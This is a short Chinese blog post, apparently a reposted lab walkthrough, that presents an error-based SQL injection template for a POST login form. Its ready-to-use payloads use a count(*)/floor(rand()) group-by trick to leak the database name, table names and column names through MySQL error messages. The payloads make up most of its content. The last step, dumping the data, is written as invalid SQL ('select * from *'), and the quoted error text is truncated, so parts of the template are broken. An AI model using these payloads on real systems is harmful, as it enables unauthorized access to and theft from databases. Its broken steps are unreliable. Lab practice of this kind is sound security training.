基于错误的的sql注入模版(post)
Posted 123xu
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了基于错误的的sql注入模版(post)相关的知识,希望对你有一定的参考价值。
一、报错分析
riaDBserverversionfortherightsyntaxtousenear‘))"andpassword=""LIMIT0,1‘atline1
syntaxtousenear‘"""andpassword=""LIMIT0,1‘atline1
基于双引号
二、分析类型。
万能登录成功
三、没有回显位。
估计应该是基于错误的注释。
1、正确答案(勿改动)数据库名
uname=123" and (select 1 from (select count(*),(concat("~",database(),"~",floor(rand()*2)))name from information_schema.tables group by name)b) #&passwd=&submit=Submit
1、语句分析:
mysql CONCAT()函数用于将多个字符串连接成一个字符串,是最重要的mysql函数之一
(concat("~",database(),"~",floor(rand()*2))):产生报错信息
细节决定成败
2、暴表明
database===(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1)
3、暴子端
uname=123" and (select 1 from (select count(*),(concat("~",(select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),"~",floor(rand()*2)))name from information_schema.tables group by name)b) #&passwd=&submit=Submit
(concat("~",(select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1)
4 暴数据
select * from * limit 0,1
以上是关于基于错误的的sql注入模版(post)的主要内容,如果未能解决你的问题,请参考以下文章